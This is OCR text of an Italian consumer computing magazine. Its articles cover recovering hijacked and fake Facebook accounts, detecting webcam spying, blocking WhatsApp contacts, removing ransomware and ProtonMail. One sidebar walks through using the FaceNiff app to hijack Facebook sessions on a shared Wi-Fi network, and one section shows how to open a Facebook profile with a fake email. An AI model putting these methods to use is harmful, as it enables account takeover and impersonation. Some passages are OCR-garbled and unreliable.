alternativa, il numero di cellulare fornito a 
Facebookal momento della registrazione 
e confermiamo con Cerca. Supponiamo 
di avere inserito l'indirizzo di posta elet¬ 
tronica e che, dunque, il pirata non ab¬ 
bia variato l'e-mail associata all'account 
Facebook. 



2 Nella nuova pagina cheappare possia¬ 
mo scegliere se ricevere un messag¬ 
gio nella mailbox contenente un link che 
ci permetterà di reimpostare con estrema 
facilità la nostra password o, nel caso di 
un indirizzo di posta elettronica di Gmail, 
se verificare la nostra identità tramite il 
Google Account Effettuata la nostra scelta 
proseguiamo con Continua e apriamo il 
messaggio che abbiamo appena ricevu¬ 
to. Il nostro consiglio è quello di settare 
una password abbastanza complessa 
(alterniamo numeri a caratteri alfabetici 
e teniamoci sempre su una lunghezza 
non inferiore ai 12 caratteri). 




ATTACCHI CON 
LO SMARTPHONE 


All'Interno di una rete 
locale è sufficiente 
usare un telefonino 
Android e un'app come 
FaceSniff per scoprire 
i dati di accesso a 
Facebook degli utenti 
connessi nella LAN che 
usano il social network. 
Dal suo telefonino, il 
malintenzionato, avvia 
il browser e si sposta 
in Impostazioni per 
ripulire Cronologia e 
cookie. Installa Face- 
Niff.apk e si connette 
ad unareteWi-Fie 
avvia FaceSniff. La ri¬ 
cerca di una potenziale 
vittima ha inizio: se 
qualche altro utente 
connesso alla stessa re¬ 
te senza fili è connesso 
a Facebook, apparirà 
nella rista dopo soli 
pochi secondi. Al pirata 
basta tappare su uno 
dei nomi visualizzati 
per loggarsi coni dati 
dell'ignaro utente. 


► 
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CAMBIAMOLA 

PASSWORD! 


Quando d accorgiamo 
che qualcuno ha usato il 
nostro indirizzo e-mail 
per registrare un falso 
profilo Facebook, è buo¬ 
na norma cambiare im¬ 
mediatamente la pas¬ 
sword che utilizziamo 
per accedere all'account 
di posta elettronica. Ol¬ 
tre ad averci registrato 
a nostra insaputa su Fa¬ 
cebook, infatti, un ma¬ 
lintenzionato potrebbe 
aver violato anche la 
nostra mailbox! 


BACKUP TOTALE 
DEL PROFILO 

Per essere pronti a 
qualsiasi evenienza, 
è bene effettuare 
periodicamente un 
backup del nostro 
account Facebook. Per 
farlo, dalla home page 
del profilo, in alto a 
destra, dicchiamo su 
Impostazioni account, 
quindi su Impostazioni 
generali dell'account/ 
Scarica una copia dei 
tuoi dati di Facebook/ 
Avvia al mio archivio. In 
alternativa possiamo 
utilizzare la versione 
freedi SodalSafe (se¬ 
zione Internet del Win 
DVD-Rom) che fornisce, 
appena installato e 
avviato, una chiave di 
licenza da usare due 
volte per procedere con 
l'attivazione del sof¬ 
tware su due diversi PC 
Effettuata l'attivazione, 
dobbiamo poi installare 
Adobe Air (seguendo la 
procedura indicata) e 
inserire le credenziali 
del nostro account Face¬ 
book. Il backup impiega 
un tempo variabile in 
base alle dimensioni e 
al numero di documenti 
caricati sul profilo. 



Account non autorizzato! 


Se qualcuno utilizza un nostro indirizzo e-mail per registrare un falso profi 
intestato, dobbiamo subito segnalare l’abuso e disattivare l’account Ecco i 


rotilo a noi 
come 


ixsam Spetta* • - urfaiiaa - stampa 

C-gge^t Do you know ? 

Da i* 0 **-nu/ne*gtac#ae;ww« 

A 1lww a „ r«*Wa •»bev»l*lL 

:«u 01 / 01/2014 13*4 


facebook 


Do yuu bww 1 and 

"ava rt mi mp i vac *av «*•« a« Fk«; :i Ce'nd •'«rei 

rd unerivi ki m m i a i. sfrAw ed iv» 



^ L’e-mail del falso profilo 

■J Un'e-mail che può insospettirci è quella spedita ad un 
indirizzo non usato per iscriverci a Facebook: cita un 
nostro profilo e ha contenuti social. Effettuiamo il login a Face¬ 
book con il nostro account personale, nella barra di ricerca digi¬ 
tiamo l’e-mail usata per il profilo falso e clicchiamo sulla lente. 



^ La password deiraccount 

3 Una volta trovato l’account, richiediamo un'e-mail per 
reimpostare la password. Selezioniamo l’opzione Inviami 
un’e-mail con un link per reimpostare la password e premiamo 
Continua. Riceveremo per posta elettronica un codice: inseria¬ 
molo nella nuova pagina e premiamo Continua. 



^ ... e poi disattiviamolo! 

g In basso selezioniamo l’opzione relativa alla motivazio¬ 
ne della disattivazione dell’account, digitiamo nel box di 
testo una breve spiegazione più dettagliata, spuntiamo la voce 
Non ricevere e-mail da Facebook in futuro e premiamo il pul¬ 
sante Conferma. 



^ Facciamo la segnalazione 

2 Sul falso profilo clicchiamo sulla rotellina, scegliamo 
Segnala/Blocca, invia una segnalazione/Segnala l’ac¬ 
count di NomeUtente e Questo diario finge di essere me... 
Riceveremo un'e-mail: clicchiamo su https://www.facebook. 
co m/recover/i n iti ate e seguiamo le istruzioni. 


facebook 



^ Prima entriamo nel profilo... 

4 Nella successiva schermata in Nuova password digitia¬ 
mo una nuova password per il profilo. Digitiamo la stes¬ 
sa password anche nel box Conferma password e premiamo 
Continua. Quando compare la pagina del falso profilo cucchiamo 
sulla voce Disattiva il tuo account In basso. 



^ L’accourrt è fuori uso! 

0 Digitiamo la password scelta al Passo 4 e facciamo clic 
su Disattivare ora. A questo punto il falso profilo Facebo¬ 
ok è disattivato. Riceveremo anche un'e-mail che ci confermerà 
la disattivazione (l’account sarà comunque riattivabile in qualun¬ 
que momento cliccando su Riattiva l’account). 
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Il falso profilo è stato creato! 

Ci verrà data la possibilità di impostare la nostra immagine del profi¬ 
lo. Proseguiamo cliccando su Salta. Anche se il processo di registra¬ 
zione non è stato comletato, potremo fin da subito accedere alla bacheca 
e utilizzare II falso profilo creato per postare messaggi o chiedere amicizie. 


Nuove amicizie, ma a tempo! 

Incredibile ma vero! Abbiamo scoperto che esiste addirittura la possibilità di aprire e utilizzare, anche 
se per un tempo limitato, un nuovo account senza completare le registrazione al social network. 


^ Impostiamo un profilo facebook a tempo 

Colleghiamoci a www.facebook.com e nella sezione registrazione 
inseriamo un indirizzo e-mail qualsiasi (anche fasullo), una password 
di accesso, impostiamo una data di nascita e dopo aver scelto il sesso cuc¬ 
chiamo su Registrazione. Nella schermata successiva cucchiamo su Salta. 




Sbirciamo ira le 

personali deU'aocount. Generalmente 
chicrea un aocouni fa ke tasca 
tetti 1 campi in bianco e nonpert» 
tempo a compilaHi uno ad uno. 


.IMMAGINI 9ENZA IUTEN gkrjtr^ tn> te 

rtìraii; .— 

sarta 

ricorri sofiware^CbeckerOoi^ 
sul DVD) che consente di attenuare 

automaticamente I 1 analisi de»® 

dei prora dei nostri am,a e oorrirotere 

sono siaie prese da Internet. 


r-LA DATA DI NASCITA 

Scorriamo la iimeline del 

SMESSA*» 

si tratti di un account falce. 


2 amici da tutto 

IL MONDO 

Diamo un'occhiata alla lista dei 
suoi amici: tanto più account 
può essere falso quanto piu m 
essa sono presenti persone dette 
nSonalitè più (Separate senza u® 
gruppo ben definito. Controlliamo 
and» quanti amici abbiamo ai 
comune: nonave^nM^^ 0 
può essere indice di profilo talee. 

/>UNA BACHECA 
3QUA8I VUOTA 

Uggiamo attentamente la ^ebeca 
djprofllo che ci ha contattato. 

Se I post, i Snk e i commenti 
inseritidall'utente si OortenoaAe 

dita di una mano, probabamente 
si tratte di un falso account. 


^ domande NEI P OST 

| Se 'n becheca sono preso™ 

motte domande dal tipo 

mi dici chi arfT poe^tedaPT 
utenti, quasi sicuramente I account 
che ci ha contattato è fasullo. 

Everdualrr^ facciam^ar«he 

noi, tramite messalo privatocene 
domande dirette scia sua identtfe. 

Se non riceviamo nessuna esposta, 
cominciamo ad insospettirci. 

-»CATTIVI BUGIARDI 

Chi crea uno o più falsi accour J* 

di solito dimostra poca coerenza nei 

oorrienutt ohe po^Puo^fera 

ad esempio che fecaa oonfùsmna 

e dioa di essere prima <* 
e poi di un'altra, oppure si spaca 


per una persona giovane e ^most ri 
Invece una oonoecenza approfondita 

di un'epoca antecedente aquella 

della date di nascita dichiarata. 

8 NESSUN TAG 

chi ci ha chiesto l'amicizia non 
è stato mai taggeto? Or* P‘*!* na 
reale generalmente è taggetein 
qualche foto. 8e non lo è, allora 
oominciamo a pensare chesi 
potrebbe trattare di un account falso. 

9 MAI AVERE FRETTA 

Se non abbiamo la Mitezza 
che un profilo Facebook sia 
reale, non siamo precipite® a 
concedergli l'amicizia. Be e. tratta 
infetti di un nostro amico, non 
tarderà a contattarci framde 
messaggio privato per identificarsi 
di persona e sollecitare la 
concessione dell'amicizia. 


|z\GLI AMICI DEGÙ AMICI 

Sa non conosciamo chi a 
ha chiesto l'amicizia, priora c# 
rifiutare l'amicizia, verifichiamo ee 
abbiamo un amico in comune sul 
"^.Potrebbe essere 
infatti 6emp#cemerrte un amico di 
un nostro amico che ha pe nsato 
di contattarci perche condividiamo 

gli stessi gusti musicali. 
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| Antivirus&Sicurezza 


Ti spio dalla Webcam 

•/ È possibile scoprire se qualcuno sta utilizzando 

la Webcam del notebook a mia insaputa? 

V Come posso terminare il processo malevolo e. in caso 

di processi dubbi, disattivare la cam? 


SERVE A CHI... 

... vuole proteggere la propria privacy 
in Rete 


G li esperti di sicurezza informatica lo defi¬ 
niscono “camfecting", owero il processo 
con il quale, attraverso l'utilizzo di un software 
malevolo, una persona malintenzionata può 
prendere possesso da remoto della Webcam 
del PC ed attivarla a nostra insaputa riuscendo 
a guardare e registrare tutto quello che accade 
davanti alla nostra postazione informatica. 
Ma come è possibile tutto ciò? L'infezione del 
sistema può avvenire mediante l'installazione 
di software apparentemente innocui che al 
loro interno, però, nascondono i cosiddet¬ 
ti Trojan, ovvero programmi che, una volta 
installati nel computer dell'ignara vittima, 
consentono a malintenzionati di prenderne 
il controllo totale. 


La trasformazione dei virus 

Siamo di fronte ad una nuova tipologia di 
worm che non si limitano ad inibire o dan¬ 
neggiare alcune funzioni del computer (file 
System, registro di sistema, file DLL); si tratta 
di veri e propri programmi il cui fine è quello 
di violare la privacy a nostra insaputa con il 
rischio di ritrovare alcune immagini personali 
sparse per il Web. Basti pensare al caso di Ra¬ 
chel Hyndman, una studentessa ventenne di 
Glasgow, che è stata spiata per diversi giorni da 
un hacker che, utilizzando un escamotage, era 
riuscito a prendere il controllo della Webcam 
del suo computer portatile. Ma esiste un me¬ 
todo efficace per proteggersi da questi virus 
spioni? Come faccio a scoprire se la Webcam 
viene utilizzata a mia insaputa? Ogni Webcam, 
esterna o integrata nel notebook, è dotata di 
una spia che si accende nel momento in cui la 
periferica è in funzione. Dobbiamo preoccupar¬ 
ci quando il led si accende anche se non è stato 
avviato alcun software per la videochiamata. In 


questi casi verifichiamo subito l'autenticità dei 
processi di sistema che utilizzano la Webcam. 
Se qualcosa non ci convince... passiamo alla 
fase due: "killare" il processo sospetto. Il sof¬ 
tware che ci permette di tenere sotto controllo 
i processi che utilizzano la nostra Webcam ed, 
eventualmente, terminarli con un solo clic è 
Process Explorer. Vediamo come utilizzarlo 
per salvaguardare la nostra privacy. 

PROCESS EXPLORER 

Lo trovi su •'DVD 

TERMINIAMO! PROCESSI DUBBI 
E DISABILITIAMO LA WEBCAM 

Dalla schermata principale di Process Explorer cuc¬ 
chiamo sul nome del processo con il tasto sinistro del 
mouse e selezioniamo Hill process. In questo modo, 
naturalmente, il pericolo non è totalmente scongiura¬ 
to. In attesa di una scansione e una rimozione definiti¬ 
va del virus possiamo disattivare temporaneamente la 
Webcam da Pannello di controllo\Gestiane dispositivi 
diccando col tasto destro del mouse sul nome della 
nostra Webcam e selezionando Disattiva. 


Metti al sicuro la tua Webcam da sguardi indiscreti 



I Dal pannello di controllo selezioniamo Ge¬ 
stione dispositivi. Scegliamo la Webcam dal 
menu relativo a Dispositivi di acquisizione im¬ 
magini e facciamo clic con il pulsante sinistro del 
mouse selezionando la voce Proprietà. Occhia¬ 
mo sul tab dettagli e copiamo il campo Valore. 



2 Installiamo il programma Process Explorer 
(che trovi sul Win DVD) e avviamolo. Cuc¬ 
chiamo sul menu Find\Find Handle or DLL. A 
questo punto inseriamo il valore che abbiamo 
copiato precedentemente e clicchiamo sul ta¬ 
sto Search. 
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3 11 programma inizierà a cercare tutti i proces¬ 
si che utilizzano la nostra Webcam. Nel no¬ 
stro caso appare una sola riga relativa a Skype. Se 
nell'elenco dovesse apparire un processo sospetto, 
conviene procedere con una scansione del PC alla 
ricerca del codice malevole. 


48 Win Magazine Speciali 



















































| Internet 


A scuola di hacker 


Ficcanaso: alla larga dai Social! 

■/ È possibile bloccare determinati contatti WhatsAp p 

per evitare di ricevere così i loro messaggi? 

V II blocco può essere effettuato indipendentemente 

dal sistema operativo mobile utilizzato? 


SERVE A CHI... 

... vuole tenere alla larga dal Social 
gli amia troppo impiccioni 


I n questi ultimi due anni stiamo registrando 
una crescita esponenziale degli abbonamenti 
per cellulari che, oltre al traffico voce, includono 
anche quello dati. Il motivo di tanto succes¬ 
so è da ricercare nella diffusione a macchia 
d'olio delle applicazioni Social come Facebook, 
WhatsApp & Co. che richiedono una connes¬ 
sione h24 per il loro utilizzo. 

GLI SMS ARRIVANO DAI SOCIAL 

È un dato di fatto! I tradizionali messaggini di 
testo vengono utilizzati sempre meno. Da una 
recente indagine, infatti, risulta che le APP social 


hanno preso il posto degli SMS. Il motivo che ha 
spinto molti utenti ad abbandonare i messaggini 
di testo a favore di WhatsApp è innanzitutto la 
possibilità di utilizzare quesfultima per inviare 
note, senza limiti di caratteri e contenuti multi¬ 
mediali, in modo gratuito. Installare e configu¬ 
rare l'applicazione è un gioco da ragazzi. Dopo 
aver scaricato il tool tramite lo store del proprio 
smartphone ed aver verificato il numero di te¬ 
lefono, l'applicazione aggiungerà i contatti in 
base a quelli presenti in rubrica. Naturalmente 
tutte le persone che avranno il nostro numero di 
telefono vedranno aggiungersi il nostro contatto 
su WhatsApp. L'applicazione permette a chiun¬ 
que di memorizzare un numero di telefono; ma 
mentre fino a poco tempo fa automaticamente 
si aveva libero accesso a tutte le informazioni 
del profilo, oggi grazie a nuovi aggiornamenti 
sulla privacy, solo i contatti memorizzati sulla 


Tre passi per bloccare un contatto WhatsApp 
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< (C) Privacy 



CHI PUÒ VEDERE LE MIE INFORMAZIONI 
PERSONALI 


Ultimo accesso 

Tutti 

Foto del profilo 

Tutti 

Stato 

Tutti 

Se non condividi il tuo ultimo accesso non 


I Dal nostro smartphone avviamo l'applica¬ 
zione tappando sull'apposita app. Successi¬ 
vamente, premiamo sul tasto Opzioni e quindi 
su Impostazioni. 


2 Selezioniamo Account \Privacy. A questo 
punto sotto la voce Contatti bloccati po¬ 
tremmo visualizzare la lista nera degli amici di 
WhatsApp. 


nostra rubrica potranno vedere informazioni 
quali l'ultimo accesso, lo stato e le foto. Se invece 
vogliamo bloccare i nostri contatti "impiccioni", 
così che non potranno più accedere alle info del 
nostro profilo o inviarci messaggi, esiste una 
funzione specifica. Vediamo come attivarla. 


E SE POSSIEDO UNO SMARTPHONE? 

Naturalmente WhatsApp offre la possibilità di bloccare i 
contatti anche nella versione per iOS e Windows Phone. 
Per gli utenti Apple è possibile bloccare un utente sia 
diccando sul pulsante Blocca, che appare nella finestra 
dei messaggi non appena riceviamo un messaggio da una 
persona che non abbiamo in rubrica, oppure andando su 
lmpostazioni\Account\Privacy\Bloccato e selezionando 
Aggiungi nuovo per aggiungere un contatto alla lista de¬ 
gli utenti bloccati. Anche per gli utenti Windows Phone la 
procedura è semplice: è sufficiente, nella schermata chat 
principale, toccare i tre punti in basso a destra, seleziona¬ 
re Impostazioni \Contatti bloccati ed aggiungere un con¬ 
tatto selezionandolo dopo aver selezionato il tasto (-*-). 
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< (C) Contatti bloccati 
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Tocca l'icona in alto a destra per 
selezionare un contatto da bloccare. 

I contatti bloccati non potranno più 
mandarti messaggi. 


3 Per bloccare una persona accediamo a Con¬ 
tatti bloccati e cucchiamo sull'icona in alto 
a destra per selezionare il contatto dalla rubri¬ 
ca. Adesso possiamo dormire sonni tranquilli. 
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Il nuovo virus della Guardia di Finanza 


PC ostaggio 
dei pirati! 

Il Virus della Guardia di Finanza è tornato, 
con una multa da pagare ancora più salata. 
Vediamo come debellare la minaccia 


Cosaci 

occorre 


O 

V MOLE I 


SISTEMA DI RIPRISTINO 

HIREN’S 
BOOT CD 

Lo trovi su: ►'DVD 

Sito Internet 

www. hirenstìootcd.org 


I l virus della Guardia di Finanza (o della Polizia Postale, 
a seconda delle varianti) è tornato a mietere vittime e 
a "derubare" gli ignari internauti. La nuova versione è 
stata ben architettata, studiata nel migliore dei modi per 
consentire ai pirati informatici di prendere letteralmente 
il controllo totale del nostro sistema. La nuova infezione 
virale non può essere debellata utilizzando le modalità 
classiche che si adottavano con le precedenti versioni del 
malware: non è più sufficiente, quindi, riavviare Win¬ 
dows in modalità provvisoria e tanto meno terminare il 
processo infetto in esecuzione. Ad un utente inesperto 
l'unica soluzione per “liberare" il computer sembra essere, 


purtroppo, proprio quella di pagare il riscatto da 100 euro 
(con modalità poco tracciabili e assolutamente non sicure) 
entro 72 ore dalla comparsa dell’infezione. 

Non pagate quel riscatto! 

Ovviamente si tratta di una cybertruffa ben architettata: 
la Polizia e la Finanza non si sognerebbero mai di “se¬ 
questrare” i PC degli utenti avanzando poi la richiesta di 
un riscatto per ridarne il controllo ai legittimi proprietari! 
Non bisogna quindi pagare nulla a meno di non voler 
regalare il numero della carta di credito ai criminali che si 
nascondono dietro al virus. Non è facile tenersi alla larga 


ISEcco il tool di rimozione 

Per eliminare il virus useremo uno strumento contenuto aN’intemo di Hiien’s Rescue Disk, una sorta di mini sistema 
operativo già configurato con tutti gli strumenti di ripristino. Ecco come usarlo al meglio. 



^ Un OS in miniatura 

■j Scarichiamo dal Win DVD-Rom l'archivio 
compresso Hirens.BootCD. 15.2.zip. Quin¬ 
di scompattiamolo in una qualsiasi cartella deli'hard 
disk. Al suo interno troveremo l'immagine in tonnato 
ISO di Hiren’s Boot CD. 



-x Masterizziamo il disco 

Dobbiamo adesso masterizzare l’immagi¬ 
ne di Hiren's Rescue Disk su un CD ver¬ 
gine. Se usiamo Nero Burning Rom, dal menu 
Masterizzatore cucchiamo su Scrìvi Immagine 
disco. Nella nuova schermata selezioniamo il file 
ISO, clicchiamo Aprì e poi Scrìvi. 



^ Adesso siamo pronti! 

Riavviamo il PC dal CD appena masteriz¬ 
zato: prima che appaia il logo di Windows 
premiamo F2 o Cane (a seconda del modello di 
scheda madre) per accedere al BIOS. Impostiamo 
il boot da Boot devices prìorìty (o equivalente) e 
premendo Invio per confermare. 
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13 Disinfettiamo il sistema 


Possiamo ora avviare Hiren’s Boot CD e procedere alla rimozione del virus, avvalendoci dell’aiuto di alcuni software 
“amici” in grado di riconoscere tutte le necce dell’infezione. Vediamo come procedere. 





-k Come Windows XP 

■j All’avvio di Hiren’s Boot CD cl ritroviamo 
davanti ad un elenco di voci: scorriamolo 
fino a selezionare Mini Windows XP e premiamo 
Invio per confermare la nostra scelta. Il computer 
si avvierà con una versione di Windows XP modifi¬ 
cata che ci risulterà molto familiare. 


^ Il tool adatto 

Da HBCD Menu avviamo il file manager 
Menu Programs/Browser/File Manager/ 
Total Commander. A sinistra, posizioniamoci in C:l 
System Volume lnformation\_restore{XXXX}\RPX 
(al posto della X ci saranno una serie di lettere e 
numeri), a destra in C:\WIND0WS\system32\config. 


La data è quella esatta 

3 In C:\System Volume lnformation\_ 
restore{XXXX) avremo una o più cartelle 
(nominate RP1, RP2e così via) che rappresentano 
i punti di ripristino del sistema: scegliamone uno 
ed entriamo nella cartella con data di creazione 
più recente, ma sempre antecedente all'infezione. 



-k Questione di nomi 

A Dalla cartella Snaps/iof copiamo i file SAM, 
SECURITY, SOFTWARE e SYSTEM, incollia¬ 
moli in C:\WINDOWS\sistem32\config e rinominia¬ 
moli cancellando la dicitura iniziale _REGISTRY_ 
MACHINE_. Alla richiesta di sostituzione file cuc¬ 
chiamo OVERWRITE e riawiamo il sistema. 



L’antivirus adesso non serve 

5 Disattiviamo l’antivirus installato nel PC, sca¬ 
richiamo dalla sezione Antivirus&Sicurezza 
del Win DVD il tool di rimozione Combofix, avviamo¬ 
lo e attendiamo che faccia il suo dovere. Al termine, 
scarichiamo anche ADWCleaner. Avviamolo e clic- 
chiamo Scansione, quindi Pulisci. 


^ Un ultimo controllo 

g II computer sembra pulito, ma è meglio 
essere sicuri: a questo proposito installia¬ 
mo e avviamo CCleaner, quindi cucchiamo Avvia 
Pulizia. La procedura può durare anche parecchi 
minuti: una volta finita, chiudiamo il programma ed 
effettuiamo una scansione con un buon antivirus. 


da questa minaccia. La nuova variante del 
virus, infatti, sfrutta alcune falle presenti nel 
plug-in Java: pertanto i sistemi con browser 
non aggiornati sono più vulnerabili degli altri 
e ricevono fìnte richieste di aggiornamento 
che in realtà sono dei vettori usati dal virus 
per diffondersi velocemente. Il PC può essere 
infettato anche navigando sul Web e cliccando 
sui banner che promettono nuovi software 
in regalo e contenenti un ingannevole tasto 
Download. Una volta che il virus si è insedia¬ 
to nel computer, il sistema verrà riavviato e 
comparirà una schermata con la nostra foto 


(scattata con la Webcam del PC, se presente), 
una foto del Presidente della Repubblica, il 
logo di una delle Forze dell'ordine italiane e 
infine una sorta di sanzione da pagare, con 
tanto di motivazione, nella quale ci accusano 
della diffusione di materiale pornografico o 
della violazione di alcuni articoli della Co¬ 
stituzione. 

Rimozione in corso 

La procedura per rimuovere il virus ha una 
difficoltà variabile, in funzione del sistema 
operativo installato nel PC. In questa guida, 


analizzeremo con attenzione le procedure di 
rimozione per i sistemi operativi più diffusi: 
Microsoft Windows XP, Vista, 7 e per gli 
ultimissimi Windows 8 e 8.1. È importante, 
inoltre, tenere sempre aggiornato il siste¬ 
ma operativo e tutti i software che usiamo 
quotidianamente installando le patch e gli 
update rilasciati dai produttori. Non biso¬ 
gna mai dimenticare, inoltre, di aggiornare 
costantemente le firme del nostro antivirus 
ed effettuare periodicamente una scansione 
del sistema così da bloccare ogni possibile 
focolaio di infezione! ► 


Speciali Win Magazine 51 





































































Il nuovo virus della Guardia di Finanza 


Centro sicurezza 


3 L’importante è ripristinare 

Vediamo adesso come accedere al rispristìno configurazione di sistema di Windows Vista, 7 e 8 per rimuovere 
l’infezione del virus della Guardia di Finanza. Pochi die e il nostro PC sarà di nuovo “libero”! 



Modalità provvisoria 

Modalità provvisoria con roto 

Modalità provvisoria con pronpt del comandi 


Abilita registrazione avvio 
attiva video a bassa risoluzione (640x4*0) 
ultima configurazione valida nota (avanzata) 
Modalità ripristino servizi directory 
Modalità di debug 


-k Modalità ripristino attivata 

•| Per awiare il ripristino configurazione di sistema, premiamo 
ripetutamente F8 all'accensione del PC: ci troveremo davanti una 


schermata con un elenco di opzioni: scegliamo Ripristina il computer. 
Dopo alcuni secondi si aprirà la schermata . 

VUtO 
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UUkzza i cantre! a schermo per e**jur» l.tj scansione amvirvs del PC 
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-a. È il momento di fare un po’ di pulizia 

; Come visto per Windows XP, eseguiamo una pulizia approfondita 
del sistema utilizzando le utility Combofix, ADWcleaner e CCleaner 
(seguiamo i Passi 5 e 6 del Macropasso B), avendo l'accortezza di disat¬ 
tivare temporaneamente eventuali antivirus installati nel sistema. 



Ripristino del sistema 


1 Pmmpt dei 

/*: 

Utilizza un punto di ripristino 

EH 

1 comandi 


1 registrato nel PC per ripristinare 

I Ricnluniine avanzata dai 


1 Windows 


1 problemi 






Ripristino immagine di 


1 Impostazioni di 


sistema 

o 

I awio 


Ripristina Windows con un file di 

1 Modifica la impostazioni 




| dell'avvio di Windows 


1 Ripristino automatico 



<o> 

Correggi i problemi che 



impertitrnnn il rarir a mentri di 




Windows 





Risolve automaticamente problemi die «ipedscono ravvio di wndo-.vs 



’Jkt 

Roristna lo sta tcL/Windows relativo a un momento precedente 

J. 

Ripristino ir-MiijQinc del sistcnu 

Rjpristna il computer utilizzando un'immagine del sistema creata n precedenza 

■m 

Oiagnostlra memoria Windows 

Controta il computer per individuare eventuai erron hardware relativi alla memoria 


PromDt dei comandi 

Aori una finestra dd promot dei comandi 


Arresta s*stema j Ravvia 


^ Consigli? No. grazie! 

Il sistema ci suggerirà un Riprìstino consigliato: selezioniamo Scegli 
un punto di ripristino diverso e dall'elenco di punti di ripristino 
individuiamone uno con data antecedente a quella in cui è avvenuta 
l’infezione del virus. Ultimata la procedura di ripristino, il PC si riawierà. 



^ È tutto più facile 

Accendiamo il computer, posizioniamoci con il mouse nell'angolo 
superiore destro, facendo apparire la Charm bare cucchiamo quin¬ 
di su Impostazioni. Teniamo premuto sulla tastiera il tasto Shift di sinistra 
e cucchiamo su Arresta, scegliendo però l'opzione Riavvia il sistema. 
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Le opzioni avanzate 

2 Scegliamo l’opzione Risoluzione dei problemi e da Opzioni avanzate 
avviamo l'utility Riprìstino del sistema. Scegliamo Avvio Avanzato. Il 
PC verrà riavviato. Nella successiva schermata selezioniamo l’account da 
ripristinare, ovviamente occorre inserire una eventuale password. 


Tutto toma come prima 

2 Ci troveremo davanti alla schermata di Riprìstino configurazione di 
sistema , nella quale selezioniamo un punto di ripristino anteceden¬ 
te all'infezione del virus. Proseguiamo seguendo le istruzioni a video. La 
procedura durerà diversi minuti e alla fine il PC verrà riavviato. 
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Con Aruba Cloud, 

potrai scegliere il data center dove attivare i tuoi 
cloud server in Italia, in uno dei due data center di 
nostra proprietà conformi ai massimi standard 
di sicurezza, oppure in uno del nostro network 
europeo a tua scelta tra Germania, Francia, 
Inghilterra e Repubblica Ceca. 

Dal pannello di controllo di Aruba Cloud, con 
estrema facilità e trasparenza, potrai decidere la 
localizzazione dei tuoi dati che più si adatta alle 
tue necessità. 




E possibile 

scegliere J 

dove attivare m 

un cloud server M i 



3 6 data center API e 

Hypervisor in Europa connettori 



Più di 70 
tempiale 



Pay 

per use 


Economico e trasparente, attiva subito il tuo cloud server 
a meno di 12 €/mese, incluse le licenze Parallels Plesk v e Windows™. 


Richiedi una prova! www.cloud.it +39.0575.0508 


1 



croba 


CLOUD 


Cloud Privato Cloud Ibrido Cloud Object Storage 


Cloud Pubblico 


Servizi Managed 



0 A scuola di hacker 


| Per saperne di più | E-mail anti-intercettazione | 


L’e-mail anti 
intercettazione 

Abbiamo testato in anteprima ProtonMail, il dient di posta da vero 
007. Ecco come usarlo per crittare ogni tua comunicazione in Rete 


E siste un sistema davvero sicuro per co¬ 
municare su Internet senza che qualcuno 
possa intromettersi tra noi e il nostro in¬ 
terlocutore? A quanto pare, sì: si chiama Pro¬ 
tonMail (www.protonmail.ch) ed è un client di 
posta elettronica che, promettono i suoi ideatori, 
è davvero a prova di intercettazione! Dietro 
ProtonMail c’è un team di quattro ricercatori del 
CERN di Ginevra che hanno messo insieme le 
loro competenze matematiche, ingegneristiche 


e fisiche per realizzare una cassaforte virtuale 
talmente sicura per i nostri dati "da rendere le 
intercettazioni così complicate e costose da farle 
diventare impossibili", come ha dichiarato uno 
dei suoi sviluppatori. 

Grazie Mister Snowden 

L’idea di realizzare una nuova piattaforma di 
posta elettronica è stata del giovane ricerca¬ 
tore Andy Yen: era il 2013 e in quei giorni sulla 


stampa internazionale (in particolare sul 
Guardian e sul Washington Post) venivano 
pubblicati i primi documenti riservati che il 
giovane Edward Snowden era riuscito a fare 
uscire dalle stanze segrete della NSA, l'Agen¬ 
zia per la Sicurezza Nazionale americana. 
Lo scandalo Datagate, scoppiato in seguito 
alle rivelazioni dell’ormai ex dipendente dei 
servizi segreti statunitensi, convinse Yen che 
era arrivato il momento di fare qualcosa per 


ProtonMail: utilizzo in pratica 

Anche se ancora in fase di beta, abbiamo avuto la possibilità di provare la Webmail tramite la richiesta di un invito. 
Ecco come utilizzarla dopo aver creato un account personale. 



^ Un invito riservato 

■\ Per usare la nuova piattaforma di Web- 
mall occorre, come prima cosa, ottene¬ 
re un invito da parte dei suoi sviluppatori. Colle¬ 
ghiamoci quindi all'indirizzo https://protonmail.ch 
e clicchiamo sul pulsante Create Account. For¬ 
niamo i dati richiesti e attendiamo che la nostra 
richiesta venga accolta: la community di Proton¬ 
Mail è molto attiva, ma potrebbero trascorrere 
molti giorni. 


^ Effettuiamo il loain 

Ottenuto l’invito allo sviluppo della piat¬ 
taforma, possiamo accedere al nostro 
account collegandoci alla pagina https://proton- 
mail.ch/login.php e digitando il nostro username, 
la password e cuccando su Login. Per garan¬ 
tire il massimo livello di protezione, ProtonMail 
ci chiederà anche la chiave di decodifica usata 
per criptare l’intera casella di posta: digitiamola 
e clicchiamo su Decrypt Mailbox. 


^ L’e-mail è criutata 

L’interfaccia grafica di ProtonMail è molto 
simile a quella di altre Webmail e anche 
il suo utilizzo è semplicissimo, sollevando l'uten¬ 
te da qualsiasi procedura di criptazione: è tutto 
automatico! Per creare un nuovo messaggio clic¬ 
chiamo sul pulsante Compose. Inseriamo il desti¬ 
natario in 7o, l'oggetto del messaggio in Subject. 
il testo nella finestra Message e inviamolo clic- 
cando Send. 
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Intervista esclusiva 


COS'È E COME FUNZIONA PROTONMAIL: LA PAROLA AL SUO IDEATORE 


Ecco cosa ci ha raccontato il co-fondatore del pro¬ 
getto, Andy Yen, laureato in Fisica ed Economia 
alla Harvard University ed alla Caltech University. 

ProtonMail nasce l'estate scorsa dopo le rivelazioni 
di Edward Snowden. Molti di noi nella comunità 
scientifica al CERN sono stati scioccati dal grado 
di spionaggio governativo. Sapevamo tutti che la 
sorveglianza di massa era un problema in regimi 
repressivi come quelli in Russia o in Cina, ma non 
avremmo mai immaginatoche avvenisse su una scala 
così massiccia nelle democrazie occidentali. Questo 
davvero ci ha spinto a intervenire per combattere. 
Questa è una battaglia che la società nel suo com¬ 
plesso deve vincere perché non si può veramente 
avere la libertà senza diritto alla privacy. 

Puoi spiegare in breve li funzionamento della 
tecnologia ai nostri lettori? 

ProtonMail è diverso dagli altri sistemi di posta elet¬ 
tronica esistenti perché noi utilizziamo quella che è 
conosciuta come "crittografia end-to-end". L'idea è 
abbastanza semplice: il modo migliore per proteg¬ 
gersi contro la sorveglianza è quello di non avere 
dati a disposizione. Con ProtonMail i dati vengono 
crittografati prima che arrivino presso i nostri server, 
